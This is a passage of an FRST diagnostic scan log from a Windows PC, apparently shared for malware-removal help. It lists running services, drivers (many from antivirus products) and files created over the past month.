R2 fsulnethoster; C:Program Files (x86)F-SecureSAFEUltralightulcore1651147404fshoster64.exe [417048 2022-04-28] (F-Secure Corporation -> F-Secure Corporation)
R2 fsulorsp; C:Program Files (x86)F-SecureSAFEUltralightulcore1651147404fsorsp64.exe [107208 2022-04-28] (F-Secure Corporation -> F-Secure Corporation)
R2 fsulprothoster; C:Program Files (x86)F-SecureSAFEUltralightulcore1651147404fsulprothoster.exe [417048 2022-04-28] (F-Secure Corporation -> F-Secure Corporation)
S3 GoogleChromeBetaElevationService; C:Program FilesGoogleChrome BetaApplication101.0.4951.41elevation_service.exe [1600912 2022-04-20] (Google LLC -> Google LLC)
S3 MagicianSVC; C:Program Files (x86)SamsungSamsung MagicianSamsungMagicianSVC.exe [347576 2021-12-09] (Samsung Electronics Co., Ltd. -> Samsung Electronics Co., Ltd.)
R2 MBAMService; C:Program FilesMalwarebytesAnti-MalwareMBAMService.exe [8347832 2022-04-25] (Malwarebytes Inc -> Malwarebytes)
R2 ProductAgentService; C:Program FilesBitdefender AgentProductAgentService.exe [786536 2022-03-23] (Bitdefender SRL -> Bitdefender)
R2 rkrtservice; C:Program FilesRogueKillerRogueKillerSvc.exe [14419440 2022-03-07] (ADLICE -> )
R2 SamsungMagicianSVC; C:Program Files (x86)SamsungSamsung MagicianSamsungMagicianSVC.exe [347576 2021-12-09] (Samsung Electronics Co., Ltd. -> Samsung Electronics Co., Ltd.)
S3 Sense; C:Program FilesWindows Defender Advanced Threat ProtectionMsSense.exe [6207688 2022-04-26] (Microsoft Windows Publisher -> Microsoft Corporation)
R2 UPDATESRV; C:Program FilesBitdefenderBitdefender Securityupdatesrv.exe [284760 2022-04-20] (Bitdefender SRL -> Bitdefender)
R2 VSSERV; C:Program FilesBitdefenderBitdefender Securitybdservicehost.exe [822240 2022-04-20] (Bitdefender SRL -> Bitdefender)
S3 WdNisSvc; C:ProgramDataMicrosoftWindows DefenderPlatform4.18.2203.5-0NisSrv.exe [3116848 2022-04-08] (Microsoft Windows Publisher -> Microsoft Corporation)
S3 WinDefend; C:ProgramDataMicrosoftWindows DefenderPlatform4.18.2203.5-0MsMpEng.exe [133544 2022-04-08] (Microsoft Windows Publisher -> Microsoft Corporation)
S3 WsaService; C:WSAWsaServiceWsaService.exe [229888 2022-04-22] () [File not signed]
R2 NVDisplay.ContainerLocalSystem; C:WINDOWSSystem32DriverStoreFileRepositorynv_dispi.inf_amd64_4d7400884d0d52e3Display.NvContainerNVDisplay.Container.exe -s NVDisplay.ContainerLocalSystem -f %ProgramData%NVIDIANVDisplay.ContainerLocalSystem.log -l 3 -d C:WINDOWSSystem32DriverStoreFileRepositorynv_dispi.inf_amd64_4d7400884d0d52e3Display.NvContainerpluginsLocalSystem -r -p 30000 -cfg NVDisplay.ContainerLocalSystemLocalSystem

===================== Drivers (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R3 amdgpio3; C:WINDOWSSystem32driversamdgpio3.sys [27256 2022-01-27] (ASMedia Technology Inc. -> Advanced Micro Devices, Inc)
R3 AmdTools64; C:WINDOWSSystem32driversAmdTools64.sys [63392 2020-06-16] (Microsoft Windows Hardware Compatibility Publisher -> )
R1 atc; C:WINDOWSSystem32DRIVERSatc.sys [3947928 2022-04-20] (Microsoft Windows Hardware Compatibility Publisher -> Bitdefender S.R.L. Bucharest, ROMANIA)
R2 BdDci; C:WINDOWSsystem32DRIVERSbddci.sys [800672 2022-04-20] (Microsoft Windows Hardware Compatibility Publisher -> Bitdefender)
S0 bdelam; C:WINDOWSSystem32driversbdelam.sys [22976 2022-04-20] (Microsoft Windows Early Launch Anti-malware Publisher -> Bitdefender)
R0 bdprivmon; C:WINDOWSSystem32DRIVERSbdprivmon.sys [33208 2022-04-20] (Microsoft Windows Hardware Compatibility Publisher -> © Bitdefender SRL)
S3 bduefiscan; C:WINDOWSsystem32DRIVERSbduefiscan.sys [55864 2022-04-20] (Bitdefender SRL -> Bitdefender)
R1 ESProtectionDriver; C:WINDOWSsystem32driversmbae64.sys [103888 2022-04-25] (Microsoft Windows Hardware Compatibility Publisher -> Malwarebytes)
R3 F-Secure Gatekeeper; C:Program Files (x86)F-SecureSAFEUltralightulcore1651147404fsulgk.sys [404512 2022-04-28] (Microsoft Windows Hardware Compatibility Publisher -> F-Secure Corporation)
R0 fsbts; C:WINDOWSSystem32driversfsbts.sys [51736 2022-04-26] (Microsoft Windows Hardware Compatibility Publisher -> F-Secure Corporation)
R0 fse; C:WINDOWSSystem32driversfse.sys [193896 2022-04-26] (Microsoft Windows -> Microsoft Corporation)
S0 fselms; C:WINDOWSSystem32driversfselms.sys [15816 2022-04-26] (Microsoft Windows Early Launch Anti-malware Publisher -> F-Secure Corporation)
R3 fsfreedomewintun; C:WINDOWSSystem32driversfsfreedomewintun.sys [31248 2021-09-16] (Microsoft Windows Hardware Compatibility Publisher -> F-Secure Corporation)
R2 fsnif2; C:Program Files (x86)F-SecureSAFEUltralightnif21643898281nif2s64.sys [172480 2022-04-26] (Microsoft Windows Hardware Compatibility Publisher -> F-Secure Corporation)
R3 gdrv3; C:Windowsgdrv3.sys [36352 2022-01-19] (GIGA-BYTE Technology Co., Ltd. -> GIGA-BYTE TECHNOLOGY CO., LTD.)
R0 Gemma; C:WINDOWSSystem32DRIVERSgemma.sys [1188744 2022-04-20] (Microsoft Windows Hardware Compatibility Publisher -> BitDefender S.R.L. Bucharest, ROMANIA)
R2 HpReadHWData; C:WINDOWSsystem32driversHpReadHWData.sys [47184 2022-02-03] (HP Inc. -> Windows (R) Win 7 DDK provider)
S3 Hsp; C:WINDOWSSystem32driversHsp.sys [111952 2022-04-26] (Microsoft Windows -> Microsoft Corporation)
R2 Ignis; C:WINDOWSsystem32DRIVERSignis.sys [185312 2020-10-07] (Bitdefender SRL -> Bitdefender)
R2 MBAMChameleon; C:WINDOWSSystem32DriversMbamChameleon.sys [223176 2022-04-27] (Microsoft Windows Hardware Compatibility Publisher -> Malwarebytes)
S0 MbamElam; C:WINDOWSSystem32DRIVERSMbamElam.sys [21480 2022-04-18] (Microsoft Windows Early Launch Anti-malware Publisher -> Malwarebytes)
R3 MBAMFarflt; C:WINDOWSSystem32DRIVERSfarflt.sys [193992 2022-04-28] (Microsoft Windows Hardware Compatibility Publisher -> Malwarebytes)
R3 MBAMProtection; C:WINDOWSsystem32DRIVERSmbam.sys [70072 2022-04-28] (Microsoft Windows Hardware Compatibility Publisher -> Malwarebytes)
R3 MBAMSwissArmy; C:WINDOWSSystem32Driversmbamswissarmy.sys [239560 2022-04-27] (Microsoft Windows Hardware Compatibility Publisher -> Malwarebytes)
R3 MBAMWebProtection; C:WINDOWSsystem32DRIVERSmwac.sys [158856 2022-04-28] (Malwarebytes Inc -> Malwarebytes)
R3 nvvad_WaveExtensible; C:WINDOWSsystem32driversnvvad64v.sys [48552 2021-11-01] (Microsoft Windows Hardware Compatibility Publisher -> NVIDIA Corporation)
R3 phantomtap; C:WINDOWSSystem32driversphantomtap.sys [50248 2022-03-30] (Avira Operations GmbH & Co. KG -> The OpenVPN Project)
R3 rt68cx21; C:WINDOWSSystem32DriverStoreFileRepositoryrt68cx21x64.inf_amd64_9bf8409c8d4e92a5rt68cx21x64.sys [625560 2022-04-12] (Realtek Semiconductor Corp. -> Realtek)
R3 tap0901; C:WINDOWSSystem32driverstap0901.sys [47920 2020-02-20] (Microsoft Windows Hardware Compatibility Publisher -> The OpenVPN Project)
U3 TrueSight; C:WindowsSystem32driverstruesight.sys [38032 2022-04-28] (Adlice -> )
R0 trufos; C:WINDOWSSystem32DRIVERStrufos.sys [623008 2022-04-20] (Microsoft Windows Hardware Compatibility Publisher -> Bitdefender)
R0 vlflt; C:WINDOWSSystem32DRIVERSvlflt.sys [485792 2022-04-20] (Microsoft Windows Hardware Compatibility Publisher -> Bitdefender)
S3 vmbusproxy; C:WINDOWSsystem32driversvmbusproxy.sys [90112 2022-04-26] (Microsoft Windows -> )
S3 WdBoot; C:WINDOWSsystem32driverswdWdBoot.sys [49600 2022-04-08] (Microsoft Windows Early Launch Anti-malware Publisher -> Microsoft Corporation)
S3 WdFilter; C:WINDOWSsystem32driverswdWdFilter.sys [443664 2022-04-08] (Microsoft Windows -> Microsoft Corporation)
S3 WdNisDrv; C:WINDOWSSystem32driverswdWdNisDrv.sys [90384 2022-04-08] (Microsoft Windows -> Microsoft Corporation)
S3 HWiNFO_170; ??C:UsersPhenomAppDataLocalTempHWiNFO64A_170.SYS [X] <==== ATTENTION
S1 WinSetupMon; system32DRIVERSWinSetupMon.sys [X]

==================== NetSvcs (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)


==================== One month (created) (Whitelisted) =========

(If an entry is included in the fixlist, the file/folder will be moved.)

2022-04-28 19:03 - 2022-04-28 19:04 - 000041023 _____ C:UsersPhenomDesktopFRST.txt
2022-04-28 18:45 - 2022-04-28 18:40 - 002366976 _____ (Farbar) C:UsersPhenomDesktopFRST64.exe
2022-04-28 18:41 - 2022-04-28 19:03 - 000000000 ____D C:FRST
2022-04-28 18:40 - 2022-04-28 18:40 - 002366976 _____ (Farbar) C:UsersPhenomDownloadsFRST64.exe
2022-04-28 18:23 - 2022-04-28 18:23 - 000193992 _____ (Malwarebytes) C:WINDOWSsystem32Driversfarflt.sys
2022-04-28 18:23 - 2022-04-28 18:23 - 000158856 _____ (Malwarebytes) C:WINDOWSsystem32Driversmwac.sys
2022-04-28 18:23 - 2022-04-28 18:23 - 000070072 _____ (Malwarebytes) C:WINDOWSsystem32Driversmbam.sys
2022-04-28 18:23 - 2022-04-28 18:23 - 000000000 ____D C:UsersPhenomAppDataLocalLowIGDump
2022-04-28 18:21 - 2022-04-28 18:21 - 000000000 ____D C:WINDOWSsystem32TasksKpRm-quarantines
2022-04-28 18:21 - 2022-04-28 18:21 - 000000000 ____D C:KPRM
2022-04-28 18:19 - 2022-04-28 18:19 - 002811112 _____ (kernel-panik) C:UsersPhenomDownloadskprm_2.9.3 (2).exe
2022-04-28 18:19 - 2022-04-28 18:19 - 002811112 _____ (kernel-panik) C:UsersPhenomDownloadskprm_2.9.3 (1).exe
2022-04-28 18:13 - 2022-04-28 19:18 - 000000000 ____D C:UsersPhenomDocuments20220428
2022-04-28 17:46 - 2022-04-28 17:46 - 011331520 _____ (SurfRight B.V.) C:UsersPhenomDownloadsHitmanPro_x64 (1).exe
2022-04-28 17:41 - 2022-04-28 17:41 - 000012872 _____ (SurfRight B.V.) C:WINDOWSsystem32bootdelete.exe
2022-04-28 17:38 - 2022-04-28 17:38 - 000040976 _____ C:WINDOWSsystem32Drivershitmanpro37.sys
2022-04-28 17:31 - 2022-04-28 17:38 - 000000000 ____D C:Program FilesHitmanPro
2022-04-28 17:30 - 2022-04-28 17:30 - 014239168 _____ (SurfRight B.V.) C:UsersPhenomDownloadsHitmanPro_x64.exe
2022-04-28 16:33 - 2022-04-28 16:33 - 002811112 _____ (kernel-panik) C:UsersPhenomDownloadskprm_2.9.3.exe
2022-04-28 14:55 - 2022-04-28 18:23 - 000000000 ____D C:UsersPhenomAppDataRoamingSlack
2022-04-28 14:55 - 2022-04-28 14:55 - 102072640 _____ (Slack Technologies Inc.) C:UsersPhenomDownloadsSlackSetup.exe
2022-04-28 14:55 - 2022-04-28 14:55 - 000002208 _____ C:UsersPhenomDesktopSlack.lnk
2022-04-28 14:55 - 2022-04-28 14:55 - 000000000 ____D C:UsersPhenomAppDataRoamingMicrosoftWindowsStart MenuProgramsSlack Technologies Inc
2022-04-28 14:55 - 2022-04-28 14:55 - 000000000 ____D C:UsersPhenomAppDataLocalslack
2022-04-28 03:20 - 2022-04-28 03:21 - 184206126 _____ C:UsersPhenomDownloadsX-230120NBREX.rar
2022-04-28 03:00 - 2022-04-28 18:23 - 000038032 _____ C:WINDOWSsystem32Driverstruesight.sys
2022-04-28 02:52 - 2022-04-28 02:59 - 000426192 _____ C:WINDOWSntbtlog.txt
2022-04-28 02:42 - 2022-04-28 02:42 - 000004322 _____ C:UsersPhenomDownloadsAdd_Take_Ownership_to_context_menu.reg
2022-04-28 01:27 - 2022-04-28 01:27 - 000014790 _____ C:UsersPhenomDownloadsffz-settings (2022-4-28).json
2022-04-27 21:50 - 2022-04-27 21:50 - 000000000 ____D C:WINDOWSLastGood.Tmp
2022-04-27 18:42 - 2022-04-21 21:37 - 001905936 _____ C:WINDOWSsystem32vulkaninfo-1-999-0-0-0.exe
2022-04-27 18:42 - 2022-04-21 21:37 - 001905936 _____ C:WINDOWSsystem32vulkaninfo.exe
2022-04-27 18:42 - 2022-04-21 21:37 - 001478416 _____ C:WINDOWSSysWOW64vulkaninfo-1-999-0-0-0.exe
2022-04-27 18:42 - 2022-04-21 21:37 - 001478416 _____ C:WINDOWSSysWOW64vulkaninfo.exe
2022-04-27 18:42 - 2022-04-21 21:37 - 001432336 _____ C:WINDOWSsystem32vulkan-1-999-0-0-0.dll
2022-04-27 18:42 - 2022-04-21 21:37 - 001432336 _____ C:WINDOWSsystem32vulkan-1.dll
2022-04-27 18:42 - 2022-04-21 21:37 - 001145616 _____ C:WINDOWSSysWOW64vulkan-1-999-0-0-0.dll
2022-04-27 18:42 - 2022-04-21 21:37 - 001145616 _____ C:WINDOWSSysWOW64vulkan-1.dll
2022-04-27 18:42 - 2022-04-21 21:36 - 001467992 _____ (Khronos Group) C:WINDOWSsystem32OpenCL.dll
2022-04-27 18:42 - 2022-04-21 21:36 - 001209432 _____ (Khronos Group) C:WINDOWSSysWOW64OpenCL.dll
2022-04-27 18:42 - 2022-04-21 21:34 - 000586464 _____ C:WINDOWSsystem32nvofapi64.dll
2022-04-27 18:42 - 2022-04-21 21:34 - 000461400 _____ C:WINDOWSSysWOW64nvofapi.dll
2022-04-27 18:42 - 2022-04-21 21:33 - 001530432 _____ (NVIDIA Corporation) C:WINDOWSsystem32NvIFR64.dll
2022-04-27 18:42 - 2022-04-21 21:33 - 001177288 _____ (NVIDIA Corporation) C:WINDOWSSysWOW64NvIFR.dll
2022-04-27 18:42 - 2022-04-21 21:33 - 000725568 _____ (NVIDIA Corporation) C:WINDOWSsystem32nvml.dll
2022-04-27 18:42 - 2022-04-21 21:33 - 000712392 _____ (NVIDIA Corporation) C:WINDOWSsystem32nvidia-smi.exe
2022-04-27 18:42 - 2022-04-21 21:32 - 002120928 _____ (NVIDIA Corporation) C:WINDOWSsystem32NvFBC64.dll
2022-04-27 18:42 - 2022-04-21 21:32 - 001603152 _____ (NVIDIA Corporation) C:WINDOWSSysWOW64NvFBC.dll
2022-04-27 18:42 - 2022-04-21 21:32 - 000730328 _____ (NVIDIA Corporation) C:WINDOWSsystem32nvEncodeAPI64.dll
2022-04-27 18:42 - 2022-04-21 21:32 - 000581848 _____ (NVIDIA Corporation) C:WINDOWSSysWOW64nvEncodeAPI.dll
2022-04-27 18:42 - 2022-04-21 21:31 - 006963912 _____ (NVIDIA Corporation) C:WINDOWSsystem32nvcuvid.dll
2022-04-27 18:42 - 2022-04-21 21:31 - 006226632 _____ (NVIDIA Corporation) C:WINDOWSSysWOW64nvcuvid.dll
2022-04-27 18:42 - 2022-04-21 21:31 - 005729856 _____ (NVIDIA Corporation) C:WINDOWSsystem32nvcpl.dll
2022-04-27 18:42 - 2022-04-21 21:31 - 005100744 _____ (NVIDIA Corporation) C:WINDOWSSysWOW64nvcuda.dll
2022-04-27 18:42 - 2022-04-21 21:31 - 002932936 _____ (NVIDIA Corporation) C:WINDOWSsystem32nvcuda.dll
2022-04-27 18:42 - 2022-04-21 21:31 - 000457928 _____ (NVIDIA Corporation) C:WINDOWSsystem32nvdebugdump.exe
2022-04-27 18:42 - 2022-04-21 21:30 - 000852048 _____ (NVIDIA Corporation) C:WINDOWSsystem32MCU.exe
2022-04-27 18:42 - 2022-04-21 05:16 - 000089337 _____ C:WINDOWSsystem32nvinfo.pb
2022-04-27 17:32 - 2022-04-27 17:32 - 000000000 ____D C:ProgramDataBlizzard Entertainment
2022-04-27 17:30 - 2022-04-28 19:13 - 000000000 ____D C:UsersPhenomAppDataLocalBattle.net
2022-04-27 17:30 - 2022-04-27 17:32 - 000000000 ____D C:UsersPhenomAppDataRoamingBattle.net
2022-04-27 17:30 - 2022-04-27 17:30 - 000000940 _____ C:UsersPublicDesktopBattle.net.lnk
2022-04-27 17:30 - 2022-04-27 17:30 - 000000000 ____D C:ProgramDataMicrosoftWindowsStart MenuProgramsBattle.net
2022-04-27 17:29 - 2022-04-28 02:04 - 000000000 ____D C:Program Files (x86)Battle.net
2022-04-27 17:29 - 2022-04-27 17:29 - 000000000 ____D C:UsersPhenomAppDataLocalBlizzard Entertainment
2022-04-27 17:29 - 2022-04-27 17:29 - 000000000 ____D C:ProgramDataBattle.net
2022-04-27 17:28 - 2022-04-27 17:29 - 004837816 _____ (Blizzard Entertainment) C:UsersPhenomDownloadsBattle.net-Setup.exe
2022-04-27 13:38 - 2022-04-27 13:38 - 098870710 _____ C:UsersPhenomDownloadsffmpeg-944b8c9-ff31946-win64-nonfree.7z
2022-04-27 13:37 - 2022-04-27 13:37 - 012037363 _____ C:UsersPhenomDownloadsffmpeg-snapshot.tar.bz2
2022-04-27 13:28 - 2022-04-27 13:28 - 012975058 _____ C:UsersPhenomDownloadsTwitchDownloaderCLI-Windows-x64.zip
2022-04-27 13:28 - 2022-04-27 13:28 - 000000000 ____D C:Program FilesTwitch VOD Downloader
2022-04-27 01:32 - 2022-04-27 01:32 - 000000000 ____D C:ProgramDataMicrosoftWindowsStart MenuProgramsFreedome
2022-04-27 01:29 - 2022-04-27 01:32 - 000002464 _____ C:UsersPublicDesktopFreedome.lnk
2022-04-26 23:02 - 2022-04-26 23:02 - 000196096 _____ (Fraunhofer Institut Integrierte Schaltungen IIS) C:WINDOWSSysWOW64l3codecp.acm
2022-04-26 23:01 - 2022-04-26 23:01 - 000831488 _____ (Microsoft Corporation) C:WINDOWSsystem32Bubbles.scr
2022-04-26 23:01 - 2022-04-26 23:01 - 000774144 _____ C:WINDOWSsystem32FsNVSDeviceSource.dll
2022-04-26 23:01 - 2022-04-26 23:01 - 000557056 _____ (Microsoft Corporation) C:WINDOWSsystem32PhotoScreensaver.scr
2022-04-26 23:01 - 2022-04-26 23:01 - 000485376 _____ (Microsoft Corporation) C:WINDOWSSysWOW64PhotoScreensaver.scr
2022-04-26 23:01 - 2022-04-26 23:01 - 000442368 _____ (Microsoft Corporation) C:WINDOWSsystem32html.iec
2022-04-26 23:01 - 2022-04-26 23:01 - 000353624 _____ C:WINDOWSsystem32vp9fs.dll
2022-04-26 23:01 - 2022-04-26 23:01 - 000341504 _____ (Microsoft Corporation) C:WINDOWSSysWOW64html.iec
2022-04-26 23:01 - 2022-04-26 23:01 - 000323584 _____ (Microsoft Corporation) C:WINDOWSsystem32unimdm.tsp
2022-04-26 23:01 - 2022-04-26 23:01 - 000254976 _____ (Microsoft Corporation) C:WINDOWSSysWOW64unimdm.tsp
2022-04-26 23:01 - 2022-04-26 23:01 - 000253952 _____ (Microsoft Corporation) C:WINDOWSsystem32ssText3d.scr
2022-04-26 23:01 - 2022-04-26 23:01 - 000208896 _____ (Fraunhofer Institut Integrierte Schaltungen IIS) C:WINDOWSsystem32l3codecp.acm
2022-04-26 23:01 - 2022-04-26 23:01 - 000188416 _____ C:WINDOWSsystem32EsclProtocol.dll
2022-04-26 23:01 - 2022-04-26 23:01 - 000176128 _____ (Microsoft Corporation) C:WINDOWSsystem32Ribbons.scr
2022-04-26 23:01 - 2022-04-26 23:01 - 000176128 _____ (Microsoft Corporation) C:WINDOWSsystem32Mystify.scr
2022-04-26 23:01 - 2022-04-26 23:01 - 000122880 _____ (Microsoft Corporation) C:WINDOWSsystem32remotesp.tsp
2022-04-26 23:01 - 2022-04-26 23:01 - 000088064 _____ (Microsoft Corporation) C:WINDOWSSysWOW64remotesp.tsp
2022-04-26 23:01 - 2022-04-26 23:01 - 000079208 _____ C:WINDOWSsystem32DriversNDKPerf.sys
2022-04-26 23:01 - 2022-04-26 23:01 - 000061440 _____ (Microsoft Corporation) C:WINDOWSsystem32hidphone.tsp
2022-04-26 23:01 - 2022-04-26 23:01 - 000046592 _____ (Microsoft Corporation) C:WINDOWSSysWOW64format.com
2022-04-26 23:01 - 2022-04-26 23:01 - 000032768 _____ (Microsoft Corporation) C:WINDOWSSysWOW64hidphone.tsp
2022-04-26 23:01 - 2022-04-26 23:01 - 000027136 _____ (Microsoft Corporation) C:WINDOWSSysWOW64mode.com
2022-04-26 23:01 - 2022-04-26 23:01 - 000024576 _____ (Microsoft Corporation) C:WINDOWSSysWOW64more.com
2022-04-26 23:01 - 2022-04-26 23:01 - 000019456 _____ C:WINDOWSSysWOW64WsdProviderUtil.dll
2022-04-26 23:01 - 2022-04-26 23:01 - 000017920 _____ (Microsoft Corporation) C:WINDOWSSysWOW64tree.com
2022-04-26 23:00 - 2022-04-26 23:00 - 002125824 _____ C:WINDOWSsystem32dwmscene.dll
2022-04-26 23:00 - 2022-04-26 23:00 - 000460800 _____ C:WINDOWSSysWOW64SettingSyncDownloadHelper.dll
2022-04-26 23:00 - 2022-04-26 23:00 - 000356352 _____ C:WINDOWSsystem32Windows.Internal.UI.Shell.WindowTabManager.dll
2022-04-26 23:00 - 2022-04-26 23:00 - 000335872 _____ C:WINDOWSsystem32Windows.Internal.UI.Dialogs.dll
2022-04-26 23:00 - 2022-04-26 23:00 - 000311296 _____ C:WINDOWSsystem32EsclScan.dll
2022-04-26 23:00 - 2022-04-26 23:00 - 000294912 _____ C:WINDOWSsystem32pnpdiag.dll
2022-04-26 23:00 - 2022-04-26 23:00 - 000208896 _____ C:WINDOWSsystem32BthpanContextHandler.dll
2022-04-26 23:00 - 2022-04-26 23:00 - 000098304 _____ C:WINDOWSsystem32sstpcfg.dll
2022-04-26 23:00 - 2022-04-26 23:00 - 000086016 _____ C:WINDOWSsystem32printticketvalidation.dll
2022-04-26 23:00 - 2022-04-26 23:00 - 000086016 _____ C:WINDOWSsystem32CredProvCommonCore.dll
2022-04-26 23:00 - 2022-04-26 23:00 - 000077824 _____ C:WINDOWSsystem32APMonUI.dll
2022-04-26 23:00 - 2022-04-26 23:00 - 000069632 _____ (Microsoft Corporation) C:WINDOWSsystem32kmddsp.tsp
2022-04-26 23:00 - 2022-04-26 23:00 - 000065536 _____ (Microsoft Corporation) C:WINDOWSsystem32format.com
2022-04-26 23:00 - 2022-04-26 23:00 - 000051712 _____ C:WINDOWSSysWOW64CredProvCommonCore.dll
2022-04-26 23:00 - 2022-04-26 23:00 - 000049152 _____ (Microsoft Corporation) C:WINDOWSsystem32more.com
2022-04-26 23:00 - 2022-04-26 23:00 - 000049152 _____ (Microsoft Corporation) C:WINDOWSsystem32mode.com
2022-04-26 23:00 - 2022-04-26 23:00 - 000042744 _____ C:WINDOWSsystem32wow64base.dll
2022-04-26 23:00 - 2022-04-26 23:00 - 000040960 _____ (Microsoft Corporation) C:WINDOWSsystem32tree.com
2022-04-26 23:00 - 2022-04-26 23:00 - 000039424 _____ (Microsoft Corporation) C:WINDOWSSysWOW64kmddsp.tsp
2022-04-26 23:00 - 2022-04-26 23:00 - 000038784 _____ (Microsoft Corporation) C:WINDOWSSysWOW64msgsm32.acm
2022-04-26 23:00 - 2022-04-26 23:00 - 000034128 _____ (Microsoft Corporation) C:WINDOWSSysWOW64imaadp32.acm
2022-04-26 23:00 - 2022-04-26 23:00 - 000033576 _____ (Microsoft Corporation) C:WINDOWSSysWOW64msadp32.acm
2022-04-26 23:00 - 2022-04-26 23:00 - 000032768 _____ (Microsoft Corporation) C:WINDOWSSysWOW64scrnsave.scr
2022-04-26 23:00 - 2022-04-26 23:00 - 000015016 _____ C:WINDOWSsystem32DrtmAuthTxt.wim
2022-04-26 22:59 - 2022-04-26 22:59 - 000643072 _____ C:WINDOWSsystem32SettingSyncDownloadHelper.dll
2022-04-26 22:59 - 2022-04-26 22:59 - 000335872 _____ C:WINDOWSsystem32Windows.Management.InprocObjects.dll
2022-04-26 22:59 - 2022-04-26 22:59 - 000286720 _____ C:WINDOWSsystem32Microsoft.Bluetooth.Audio.dll
2022-04-26 22:59 - 2022-04-26 22:59 - 000180224 _____ C:WINDOWSsystem32CloudExperienceHostRedirection.dll
2022-04-26 22:59 - 2022-04-26 22:59 - 000067512 _____ (Microsoft Corporation) C:WINDOWSsystem32msgsm32.acm
2022-04-26 22:59 - 2022-04-26 22:59 - 000063384 _____ (Microsoft Corporation) C:WINDOWSsystem32imaadp32.acm
2022-04-26 22:59 - 2022-04-26 22:59 - 000061440 _____ (Microsoft Corporation) C:WINDOWSsystem32scrnsave.scr
2022-04-26 22:59 - 2022-04-26 22:59 - 000059248 _____ (Microsoft Corporation) C:WINDOWSsystem32msadp32.acm
2022-04-26 22:59 - 2022-04-26 22:59 - 000040960 _____ C:WINDOWSsystem32WsdProviderUtil.dll
2022-04-26 22:45 - 2022-04-26 22:45 - 000000000 ___HD C:$WinREAgent
2022-04-26 21:53 - 2022-04-26 21:55 - 000000000 ____D C:UsersPhenomDocuments20220426
2022-04-26 20:04 - 2022-04-26 20:04 - 000000020 ___SH C:UsersUserntuser.ini
2022-04-26 19:58 - 2022-04-28 19:15 - 000000000 ____D C:UsersPhenomAppDataRoamingdiscordcanary
2022-04-26 19:58 - 2022-04-28 18:23 - 000000000 ____D C:UsersPhenomAppDataLocalDiscordCanary
2022-04-26 19:58 - 2022-04-26 19:58 - 083143168 _____ (Discord Inc.) C:UsersPhenomDownloadsDiscordCanarySetup (2).exe
2022-04-26 19:58 - 2022-04-26 19:58 - 000002324 _____ C:UsersPhenomDesktopDiscord Canary.lnk
2022-04-26 19:58 - 2022-04-26 19:58 - 000000000 ____D C:UsersPhenomAppDataRoamingdiscord
2022-04-26 19:55 - 2022-04-27 13:22 - 000223176 _____ (Malwarebytes) C:WINDOWSsystem32DriversMbamChameleon.sys
2022-04-26 19:49 - 2022-04-26 19:49 - 000000000 ____D C:ProgramDataMicrosoft OneDrive
2022-04-26 19:48 - 2022-04-26 19:48 - 000000020 ___SH C:UsersPhenomntuser.ini
2022-04-26 18:31 - 2022-04-28 18:22 - 000000006 ____H C:WINDOWSTasksSA.DAT
2022-04-26 18:31 - 2022-04-28 18:12 - 000003658 _____ C:WINDOWSsystem32TasksCreateExplorerShellUnelevatedTask
2022-04-26 18:31 - 2022-04-27 17:18 - 000004308 _____ C:WINDOWSsystem32TasksNvDriverUpdateCheckDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2022-04-26 18:31 - 2022-04-27 17:18 - 000003976 _____ C:WINDOWSsystem32TasksNVIDIA GeForce Experience SelfUpdate_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2022-04-26 18:31 - 2022-04-27 17:18 - 000003940 _____ C:WINDOWSsystem32TasksNvNodeLauncher_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2022-04-26 18:31 - 2022-04-27 17:18 - 000003894 _____ C:WINDOWSsystem32TasksNvProfileUpdaterDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2022-04-26 18:31 - 2022-04-27 17:18 - 000003858 _____ C:WINDOWSsystem32TasksNvTmRep_CrashReport4_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2022-04-26 18:31 - 2022-04-27 17:18 - 000003858 _____ C:WINDOWSsystem32TasksNvTmRep_CrashReport3_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2022-04-26 18:31 - 2022-04-27 17:18 - 000003858 _____ C:WINDOWSsystem32TasksNvTmRep_CrashReport2_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2022-04-26 18:31 - 2022-04-27 17:18 - 000003858 _____ C:WINDOWSsystem32TasksNvTmRep_CrashReport1_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2022-04-26 18:31 - 2022-04-27 17:18 - 000003654 _____ C:WINDOWSsystem32TasksNvProfileUpdaterOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2022-04-26 18:31 - 2022-04-26 19:50 - 000003846 _____ C:WINDOWSsystem32TasksBitdefender Agent WatchDog_65D6944A0EF74FDAB96E31112AD39864
2022-04-26 18:31 - 2022-04-26 18:31 - 000003634 _____ C:WINDOWSsystem32TasksOpera scheduled Autoupdate 1642631694
2022-04-26 18:31 - 2022-04-26 18:31 - 000003580 _____ C:WINDOWSsystem32TasksBraveSoftwareUpdateTaskMachineUA
2022-04-26 18:31 - 2022-04-26 18:31 - 000003408 _____ C:WINDOWSsystem32TasksMicrosoftEdgeUpdateTaskMachineUA
2022-04-26 18:31 - 2022-04-26 18:31 - 000003356 _____ C:WINDOWSsystem32TasksBraveSoftwareUpdateTaskMachineCore
2022-04-26 18:31 - 2022-04-26 18:31 - 000003348 _____ C:WINDOWSsystem32TasksGoogleUpdateTaskMachineUA
2022-04-26 18:31 - 2022-04-26 18:31 - 000003214 _____ C:WINDOWSsystem32TasksMicrosoftEdgeUpdateTaskMachineCore1d83e245fa71e18
2022-04-26 18:31 - 2022-04-26 18:31 - 000003194 _____ C:WINDOWSsystem32TasksCCleaner Update
2022-04-26 18:31 - 2022-04-26 18:31 - 000003184 _____ C:WINDOWSsystem32TasksMicrosoftEdgeUpdateTaskMachineCore
2022-04-26 18:31 - 2022-04-26 18:31 - 000003124 _____ C:WINDOWSsystem32TasksGoogleUpdateTaskMachineCore
2022-04-26 18:31 - 2022-04-26 18:31 - 000003066 _____ C:WINDOWSsystem32TasksOneDrive Reporting Task-S-1-5-21-1599435516-3482468045-2126034812-1002
